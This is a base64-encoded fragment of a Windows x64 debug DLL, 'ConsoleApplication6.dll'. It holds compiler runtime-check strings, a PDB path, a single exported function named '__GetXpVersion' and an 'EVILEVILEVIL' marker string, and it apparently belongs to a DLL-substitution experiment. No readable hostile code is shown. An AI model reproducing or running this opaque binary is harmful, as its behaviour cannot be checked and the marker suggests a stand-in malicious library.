AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGQQAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAABAAAAAgAAAC8gAAAAAAAAAAAAAAAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA